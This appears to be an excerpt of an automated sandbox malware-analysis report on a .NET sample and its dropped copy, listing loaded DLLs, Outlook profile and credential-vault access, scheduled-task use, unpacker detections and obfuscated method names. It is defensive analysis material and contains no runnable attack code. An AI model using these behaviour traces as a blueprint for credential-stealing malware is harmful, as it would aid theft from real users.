            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\reg.exeSection loaded: wininet.dll
            Source: C:\Windows\SysWOW64\reg.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\reg.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\reg.exeSection loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\reg.exeSection loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\reg.exeSection loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\reg.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\reg.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\reg.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\reg.exeSection loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\reg.exeSection loaded: netutils.dll
            Source: C:\Windows\SysWOW64\reg.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\reg.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\reg.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\reg.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\reg.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\reg.exeSection loaded: mlang.dll
            Source: C:\Windows\SysWOW64\reg.exeSection loaded: propsys.dll
            Source: C:\Windows\SysWOW64\reg.exeSection loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\reg.exeSection loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\reg.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\reg.exeSection loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\reg.exeSection loaded: cryptbase.dll
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeSection loaded: wininet.dll
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeSection loaded: mswsock.dll
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeSection loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeSection loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeSection loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\reg.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: jlsvOH1c8bSRKqM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: jlsvOH1c8bSRKqM.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: jlsvOH1c8bSRKqM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: ZxNe.pdb source: jlsvOH1c8bSRKqM.exe, AZJifQrhDpEQCA.exe.0.dr
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: DAGiwzvTYsMjq.exe, 00000010.00000000.1786583208.0000000000EFE000.00000002.00000001.01000000.0000000D.sdmp, DAGiwzvTYsMjq.exe, 00000013.00000002.4128994331.0000000000EFE000.00000002.00000001.01000000.0000000D.sdmp, DAGiwzvTYsMjq.exe, 00000017.00000002.4128729232.0000000000EFE000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: wntdll.pdbUGP source: jlsvOH1c8bSRKqM.exe, 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000011.00000003.1861195873.0000000003182000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000011.00000003.1863498773.0000000003371000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000014.00000002.1967179845.000000000317E000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000014.00000002.1967179845.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000014.00000003.1962025631.0000000002E2F000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000014.00000003.1960067886.0000000002C73000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: jlsvOH1c8bSRKqM.exe, jlsvOH1c8bSRKqM.exe, 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, reg.exe, reg.exe, 00000011.00000003.1861195873.0000000003182000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000011.00000003.1863498773.0000000003371000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000014.00000002.1967179845.000000000317E000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000014.00000002.1967179845.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000014.00000003.1962025631.0000000002E2F000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000014.00000003.1960067886.0000000002C73000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: reg.pdb source: jlsvOH1c8bSRKqM.exe, 00000008.00000002.1861652311.0000000001248000.00000004.00000020.00020000.00000000.sdmp, AZJifQrhDpEQCA.exe, 0000000F.00000002.1960190592.0000000000BDE000.00000004.00000020.00020000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000010.00000003.1799312024.0000000000FDB000.00000004.00000001.00020000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000010.00000002.4128948551.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000013.00000003.1898624994.0000000000B5B000.00000004.00000001.00020000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000013.00000002.4128613079.0000000000B68000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: reg.pdbGCTL source: jlsvOH1c8bSRKqM.exe, 00000008.00000002.1861652311.0000000001248000.00000004.00000020.00020000.00000000.sdmp, AZJifQrhDpEQCA.exe, 0000000F.00000002.1960190592.0000000000BDE000.00000004.00000020.00020000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000010.00000003.1799312024.0000000000FDB000.00000004.00000001.00020000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000010.00000002.4128948551.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000013.00000003.1898624994.0000000000B5B000.00000004.00000001.00020000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000013.00000002.4128613079.0000000000B68000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ZxNe.pdbSHA256+ source: jlsvOH1c8bSRKqM.exe, AZJifQrhDpEQCA.exe.0.dr

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: 0.2.jlsvOH1c8bSRKqM.exe.c30000.0.raw.unpack, ekiVxK6VuR4OQnevN0.cs.Net Code: M1NmnIjfqZZ3BCdHPsm System.Reflection.Assembly.Load(byte[])
            Source: 0.2.jlsvOH1c8bSRKqM.exe.4338f30.2.raw.unpack, ekiVxK6VuR4OQnevN0.cs.Net Code: M1NmnIjfqZZ3BCdHPsm System.Reflection.Assembly.Load(byte[])
            Source: 0.2.jlsvOH1c8bSRKqM.exe.26d7d44.1.raw.unpack, PingPong.cs.Net Code: _202A_200E_202C_200B_206A_202D_202E_206A_206B_206C_202B_206C_202C_202A_200E_200E_202E_200C_206B_200F_200D_200F_206F_200F_206D_200E_206C_202B_202C_200B_202C_200B_200C_206D_200D_200F_202E_200F_206E_200D_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.jlsvOH1c8bSRKqM.exe.42b4b10.3.raw.unpack, ekiVxK6VuR4OQnevN0.cs.Net Code: M1NmnIjfqZZ3BCdHPsm System.Reflection.Assembly.Load(byte[])
            Source: 0.2.jlsvOH1c8bSRKqM.exe.50d0000.4.raw.unpack, PingPong.cs.Net Code: _202A_200E_202C_200B_206A_202D_202E_206A_206B_206C_202B_206C_202C_202A_200E_200E_202E_200C_206B_200F_200D_200F_206F_200F_206D_200E_206C_202B_202C_200B_202C_200B_200C_206D_200D_200F_202E_200F_206E_200D_202E System.Reflection.Assembly.Load(byte[])
            Source: 9.2.AZJifQrhDpEQCA.exe.2814e14.4.raw.unpack, PingPong.cs.Net Code: _202A_200E_202C_200B_206A_202D_202E_206A_206B_206C_202B_206C_202C_202A_200E_200E_202E_200C_206B_200F_200D_200F_206F_200F_206D_200E_206C_202B_202C_200B_202C_200B_200C_206D_200D_200F_202E_200F_206E_200D_202E System.Reflection.Assembly.Load(byte[])
            Source: jlsvOH1c8bSRKqM.exeStatic PE information: 0xB0A7146F [Sat Dec 1 13:02:39 2063 UTC]
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 0_2_070641FD push FFFFFF8Bh; iretd 0_2_070641FF
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_004238C3 push esi; ret 8_2_004238CE
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0040512F push esi; iretd 8_2_00405130
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0040AA5C push edi; iretd 8_2_0040AA5D
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_00414237 push ss; iretd 8_2_00414248
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_00411AC0 push ebp; ret 8_2_00411AC1
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_00417C4E push ss; iretd 8_2_00417C63
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_00417C53 push ss; iretd 8_2_00417C63
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_004084CE push ds; iretd 8_2_004084E1
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_00414483 push edx; iretd 8_2_00414484
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_00405483 push FFFFFFBBh; retf 8_2_00405485
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_00403570 push eax; ret 8_2_00403572
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_00408632 push 82FF1BCBh; retf 8_2_0040863E
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_004086C5 push ebp; ret 8_2_004086C6
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0040CF71 push ebx; ret 8_2_0040CF72
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_00404FFF push ds; iretd 8_2_0040500A
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0177225F pushad ; ret 8_2_017727F9
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017727FA pushad ; ret 8_2_017727F9
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A09AD push ecx; mov dword ptr [esp], ecx8_2_017A09B6
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0177283D push eax; iretd 8_2_01772858
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 9_2_070F36ED push FFFFFF8Bh; iretd 9_2_070F36EF
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0116C06D push edi; ret 15_2_0116C06F
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_010F1368 push eax; iretd 15_2_010F1369
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0116C54F push 8B010F67h; ret 15_2_0116C554
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0116C54D pushfd ; ret 15_2_0116C54E
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_011209AD push ecx; mov dword ptr [esp], ecx15_2_011209B6
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0116C9D7 push edi; ret 15_2_0116C9D9
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0116BF38 push edi; ret 15_2_0116BF3A
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_010F1FEC push eax; iretd 15_2_010F1FED
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_01170E7F push edi; ret 15_2_01170E81
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0116BEAD push edi; ret 15_2_0116BEAF
            Source: jlsvOH1c8bSRKqM.exeStatic PE information: section name: .text entropy: 7.9159393452530775
            Source: AZJifQrhDpEQCA.exe.0.drStatic PE information: section name: .text entropy: 7.9159393452530775
            Source: 0.2.jlsvOH1c8bSRKqM.exe.c30000.0.raw.unpack, picCfyhycqVC04P7lL.csHigh entropy of concatenated method names: 'ETVoNmy0E', 'YE2eacpgD', 'jSc75uJhr', 'LR4OUAKTW', 'ffc9u8HJl', 'jU6kgfxHp', 'JtKD8l6g7Ws4uldIaC', 'U9hcAhNp9IQNE8IAW6', 'Gk8NPtTtN', 'pTGFtHlYc'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.c30000.0.raw.unpack, b19wuHZr1gri9Sh9ho.csHigh entropy of concatenated method names: 'pMemcD7mJ4', 'LsymHWQDfc', 'pYUNwQhhth', 'PmXNs9NHdy', 'iHdmEMLWGg', 'JlAmv3ZrGZ', 'zLIm0EUurf', 'iVemAcqJLH', 'DEkmIvc4Co', 'BhomfUnk2a'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.c30000.0.raw.unpack, XTijwf2U1USfxTU6oq.csHigh entropy of concatenated method names: 'edJNPwZ0p2', 'hqxNpmHQ0j', 'WsdNjbO5Ip', 'w6dNJwvgQa', 'OWKNATmfdq', 'CITNaJeFgb', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.c30000.0.raw.unpack, gjgmXoAXn4tWbfndxk.csHigh entropy of concatenated method names: 'sEGigaUykT', 'eOLivNltwa', 'op8iAkJDuw', 'qC1iIAg347', 'OtgipFkaBJ', 'oLLijURYrU', 'HrciJ2HKJ7', 'I6ViaB3nYO', 'qBRi4CS5ED', 'u5PiTKRZuc'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.c30000.0.raw.unpack, webBCGxs4cEidVqfoA.csHigh entropy of concatenated method names: 'M5DuAgNgB7', 'uhvuIAmwrT', 'BDQufFxBGJ', 'Ha3uKg2eFf', 'HxTuW3lbUT', 'YAXuZsAqp2', 'oGBudNIyTX', 'S5cucniZ2y', 'h8Du2nJWj2', 'Hi1uHcMcOA'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.c30000.0.raw.unpack, pfKX9pTyV9AHnv1emj.csHigh entropy of concatenated method names: 'OWdCtNiuv5', 'SOqCYwBnKO', 'd8xCyXLbOU', 'JNgyHGuydu', 'W09yzdVkZe', 'kO8CwsIiEm', 'cZfCs0UOLa', 'JScChP330W', 'WHaCLZkWTt', 'ASeCXUbgWp'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.c30000.0.raw.unpack, JZ2ny8fI1YmI7oWLrL.csHigh entropy of concatenated method names: 'ToString', 'y98DEl2lK1', 'tVQDpWCvKX', 'w8mDjMRDdQ', 'HKWDJWA09y', 'zSZDawp5ur', 'P4FD44sDHD', 'bXsDTsecTf', 'IusD3aKGkA', 'AecDrOVogl'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.c30000.0.raw.unpack, IhRO8Tsw4lT9Fs7fuvm.csHigh entropy of concatenated method names: 'YOqn1fPqlW', 'IKUn8t9GfF', 'PinnohFcQY', 'E2AnejYVeD', 'mfZnlNYlMN', 'kC6n7ftKOh', 'uWhnOpU214', 'K5nnxKbrIH', 'aXnn9KYxVu', 'NO5nkIi5is'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.c30000.0.raw.unpack, VkxmdCPh0dF91gyE8L.csHigh entropy of concatenated method names: 'mOEySM2xGm', 'TPAyuVgrBj', 'ABLyqEGCDa', 'kyOyCceOMu', 'qjky64rEgL', 'SpVqWd58EI', 'NGHqZRyulM', 'V23qdvYQuj', 'f4cqcFv4cA', 'VpQq2vvhb9'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.c30000.0.raw.unpack, m7ehKDuvw5GaO3SAiB.csHigh entropy of concatenated method names: 'Dispose', 'aVcs2wccPR', 'D4qhp6FJrl', 'U67ffATqBq', 'QgRsHUbpUT', 'OCcsz64q02', 'ProcessDialogKey', 'UF2hwTijwf', 'u1UhsSfxTU', 'koqhhZF30a'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.c30000.0.raw.unpack, L2K7nbzRb5MnTUOUu0.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'SBLn5685OY', 'hPInibMbeK', 'jm2nDmclI1', 'NnunmLIZBE', 'W4anNXwWef', 'vNrnnAPvbH', 'IpnnFa23xN'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.c30000.0.raw.unpack, ORUbpUcTECc64q02WF.csHigh entropy of concatenated method names: 'WqbNtu2PR9', 'bhqNuZMXqS', 'sesNYXO3cK', 'Fs8NqhZrPN', 'wd0NyjIJ3t', 'YVwNCeptVR', 'j4lN6S7dFj', 'P7rNBVduGP', 'AhxNbZh6nd', 'bV4NRJBMPA'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.c30000.0.raw.unpack, Vfq87d0qyfa9UN0Y3r.csHigh entropy of concatenated method names: 's5f5xKkSPd', 'br559CEXyk', 'z3U5PFPKOe', 'u1D5pIB2jr', 'auw5JPKkIo', 'wSs5aVRLYq', 'xtO5Tj2Bj9', 'UPY53iY3vA', 'i8O5gdNeNO', 'cbi5EfJibe'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.c30000.0.raw.unpack, R43ntJ9WlnGQu3XYW2.csHigh entropy of concatenated method names: 'MZVYeFbD63', 'rlWY7htTrA', 'ToJYxIMhc6', 'HX7Y9Exf17', 'ILqYieMTAf', 'H9oYDjTvY3', 'jthYmxTLuc', 'FWQYNSQ1J2', 'BbqYnqr4B1', 'x6qYFRhW47'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.c30000.0.raw.unpack, ekiVxK6VuR4OQnevN0.csHigh entropy of concatenated method names: 'lx3LSQA9nb', 'kwQLtL1AZo', 'QBTLued96p', 'pbkLYoWOYn', 'GkSLqQpdGZ', 'MRsLyTZ6eF', 'cidLCkdyvt', 'KB1L6oy3mk', 'DykLB2RKK4', 'XiiLb0RwMO'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.c30000.0.raw.unpack, COQHp4sLPuyvhXixHFc.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HvRFAvvRZN', 'd1uFI4KCEt', 'eM4Ffyhxvp', 'JnXFK2OUhw', 'uReFWBLJY0', 'yxJFZgrDqx', 'Lg7FdTFrdl'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.c30000.0.raw.unpack, govCQSXA7pTF7U4miR.csHigh entropy of concatenated method names: 'kwQsCebBCG', 'b4cs6EidVq', 'IWlsbnGQu3', 'eYWsR2VUUk', 'kGqsiFZZkx', 'qdCsDh0dF9', 'X90vSAigQXuf48LRBn', 'bZxhrsDmkJgdnoaLOZ', 'IVwssZ4MdQ', 'sWksLWr7Xw'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.c30000.0.raw.unpack, CNHbGRJjsbShBn9kCk.csHigh entropy of concatenated method names: 'qpsyVDsAcd', 'DQTy1wB96J', 'CZEyolmiVm', 'kCSye3SCHc', 'U3ty7wd5X0', 'CGPyOSkK8N', 'NAny9L5em2', 'zS8yk25419', 'NXOgAmurcV1XGxbqmhs', 'bRIjQvuL6oovgJppWVJ'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.c30000.0.raw.unpack, XjaMkDreeAEx2QyBUh.csHigh entropy of concatenated method names: 'nhlC1u79iv', 'qIWC8JQmnG', 'nYFCo6bWNC', 'M2XCe52vyx', 'BfmClIJltB', 'JeiC73xqFF', 'oVyCOMP5Gw', 'F8aCxHCQYG', 'yncC9WAIoH', 'PBcCkVrYSm'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.c30000.0.raw.unpack, FNDhjfKOXWnfEgrOxW.csHigh entropy of concatenated method names: 'uDHmbNb44c', 'vMOmRjl1jW', 'ToString', 'MFYmtcF7Ip', 'IgPmuYEV60', 'GLAmYcdF13', 'NMjmqKu43A', 'fEtmy2XSLN', 'JNDmCf4mm7', 'Y2bm6uJyW4'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.c30000.0.raw.unpack, VF30aAHoJ8tYtu7HW4.csHigh entropy of concatenated method names: 'goGnsJISGS', 'dkXnLdrne1', 'zx3nXCoAag', 'qifntkA5KF', 'nqtnueJQdh', 'PRYnq6Dvlf', 'iplnyMgocv', 'jEbNdcFQFI', 'HvYNcrgEh4', 'q52N2i9CrN'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.4338f30.2.raw.unpack, picCfyhycqVC04P7lL.csHigh entropy of concatenated method names: 'ETVoNmy0E', 'YE2eacpgD', 'jSc75uJhr', 'LR4OUAKTW', 'ffc9u8HJl', 'jU6kgfxHp', 'JtKD8l6g7Ws4uldIaC', 'U9hcAhNp9IQNE8IAW6', 'Gk8NPtTtN', 'pTGFtHlYc'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.4338f30.2.raw.unpack, b19wuHZr1gri9Sh9ho.csHigh entropy of concatenated method names: 'pMemcD7mJ4', 'LsymHWQDfc', 'pYUNwQhhth', 'PmXNs9NHdy', 'iHdmEMLWGg', 'JlAmv3ZrGZ', 'zLIm0EUurf', 'iVemAcqJLH', 'DEkmIvc4Co', 'BhomfUnk2a'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.4338f30.2.raw.unpack, XTijwf2U1USfxTU6oq.csHigh entropy of concatenated method names: 'edJNPwZ0p2', 'hqxNpmHQ0j', 'WsdNjbO5Ip', 'w6dNJwvgQa', 'OWKNATmfdq', 'CITNaJeFgb', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.4338f30.2.raw.unpack, gjgmXoAXn4tWbfndxk.csHigh entropy of concatenated method names: 'sEGigaUykT', 'eOLivNltwa', 'op8iAkJDuw', 'qC1iIAg347', 'OtgipFkaBJ', 'oLLijURYrU', 'HrciJ2HKJ7', 'I6ViaB3nYO', 'qBRi4CS5ED', 'u5PiTKRZuc'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.4338f30.2.raw.unpack, webBCGxs4cEidVqfoA.csHigh entropy of concatenated method names: 'M5DuAgNgB7', 'uhvuIAmwrT', 'BDQufFxBGJ', 'Ha3uKg2eFf', 'HxTuW3lbUT', 'YAXuZsAqp2', 'oGBudNIyTX', 'S5cucniZ2y', 'h8Du2nJWj2', 'Hi1uHcMcOA'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.4338f30.2.raw.unpack, pfKX9pTyV9AHnv1emj.csHigh entropy of concatenated method names: 'OWdCtNiuv5', 'SOqCYwBnKO', 'd8xCyXLbOU', 'JNgyHGuydu', 'W09yzdVkZe', 'kO8CwsIiEm', 'cZfCs0UOLa', 'JScChP330W', 'WHaCLZkWTt', 'ASeCXUbgWp'
